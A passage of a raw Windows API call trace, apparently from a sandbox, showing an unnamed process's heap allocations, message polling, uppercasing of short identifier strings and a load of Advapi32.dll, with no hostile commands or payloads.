0x2aa9718 [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.503] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0086.503] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.503] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0086.503] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.504] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.504] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0086.504] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0086.504] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0086.505] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.506] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.507] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.507] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.507] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0086.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a720e8 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0086.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.507] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0086.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0086.508] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0086.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0086.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0086.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0086.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0086.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.509] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.509] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0086.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0086.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.510] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a684c8 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.510] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0086.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0086.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0086.511] 